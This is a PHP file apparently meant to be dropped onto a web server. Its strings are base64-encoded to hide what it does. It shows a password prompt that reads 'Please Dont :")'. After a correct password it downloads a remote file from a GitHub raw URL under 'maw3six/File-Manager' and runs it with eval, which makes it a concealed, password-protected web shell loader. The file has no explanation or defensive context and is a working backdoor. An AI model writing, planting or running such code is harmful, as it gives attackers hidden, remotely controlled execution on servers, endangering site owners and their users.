<?php session_start();

$x0 = base64_decode('JDJhJDEyJExJdjF0bVBVWHh0cjZUTE9DMEVubS5rcUNjWnpXQmptcE1CcmhHOHQ5Y0RqQndSUDdUbzhX');

if ($_SERVER[base64_decode('UkVRVUVTVF9NRVRIT0Q=')] == base64_decode('UE9TVA==')) {
    if (isset($_POST[base64_decode('cGFzc3dvcmQ=')]) && password_verify($_POST[base64_decode('cGFzc3dvcmQ=')], $x0)) {
        $_SESSION[base64_decode('bG9nZ2VkaW4=')] = true;
    } else {
        echo base64_decode('PHAgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyBjb2xvcjpyZWQ7Jz5TdG9wIEl0ITwvcD4=');
    }
}

if (!isset($_SESSION[base64_decode('bG9nZ2VkaW4=')]) || $_SESSION[base64_decode('bG9nZ2VkaW4=')] !== true) {
    echo base64_decode('PCFET0NUWVBFIGh0bWw+DQogICAgPGh0bWwgbGFuZz0iZW4iPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MSI+DQogICAgPGhlYWQ+DQogICAgICAgIDxtZXRhIGNoYXJzZXQ9IlVURi04Ij4NCiAgICAgICAgPHN0eWxlPg0KICAgICAgICAgICAgYm9keSB7DQogICAgICAgICAgICAgICAgZGlzcGxheTogZmxleDsNCiAgICAgICAgICAgICAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICAgICAgICAgICAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgICAgICAgICAgICAgIGhlaWdodDogMTAwdmg7DQogICAgICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogIzAwMDsNCiAgICAgICAgICAgICAgICBjb2xvcjogd2hpdGU7DQogICAgICAgICAgICAgICAgZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIC5jb250YWluZXIgew0KICAgICAgICAgICAgICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGlucHV0W3R5cGU9InBhc3N3b3JkIl0gew0KICAgICAgICAgICAgICAgIHBhZGRpbmc6IDEwcHg7DQogICAgICAgICAgICAgICAgZm9udC1zaXplOiAxNnB4Ow0KICAgICAgICAgICAgICAgIG1hcmdpbi10b3A6IDEwcHg7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBidXR0b24gew0KICAgICAgICAgICAgICAgIHBhZGRpbmc6IDEwcHggMjBweDsNCiAgICAgICAgICAgICAgICBmb250LXNpemU6IDE2cHg7DQogICAgICAgICAgICAgICAgbWFyZ2luLXRvcDogMTBweDsNCiAgICAgICAgICAgICAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOw0KICAgICAgICAgICAgICAgIGJvcmRlcjogbm9uZTsNCiAgICAgICAgICAgICAgICBjdXJzb3I6IHBvaW50ZXI7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBidXR0b246aG92ZXIgew0KICAgICAgICAgICAgICAgIGJhY2tncm91bmQtY29sb3I6ICNkZGQ7DQogICAgICAgICAgICB9DQogICAgICAgIDwvc3R5bGU+DQogICAgPC9oZWFkPg0KICAgIDxib2R5Pg0KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPg0KICAgICAgICAgICAgPGgxPlBsZWFzZSBEb250IDoiKTwvaDE+DQogICAgICAgICAgICA8Zm9ybSBtZXRob2Q9InBvc3QiPg0KICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icGFzc3dvcmQiIGlkPSJwYXNzd29yZCIgcGxhY2Vob2xkZXI9IkhlbGxvIEZyaWVuZHMiIHJlcXVpcmVkPg0KICAgICAgICAgICAgICAgIDxicj4NCiAgICAgICAgICAgIDwvZm9ybT4NCiAgICAgICAgPC9kaXY+DQogICAgPC9ib2R5Pg0KICAgIDwvaHRtbD4=');
    exit;
}

$o1 = base64_decode('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdzNzaXgvRmlsZS1NYW5hZ2VyL3JlZnMvaGVhZHMvbWFpbi9tYXcudHh0');

$o2 = curl_init();
curl_setopt($o2, CURLOPT_URL, $o1);
curl_setopt($o2, CURLOPT_RETURNTRANSFER, true);
$y3 = curl_exec($o2);
curl_close($o2);

if ($y3 === false) {
    echo base64_decode('RXJyb3Iu');
} else {
    eval(base64_decode('Pz4=') . $y3);
}
?>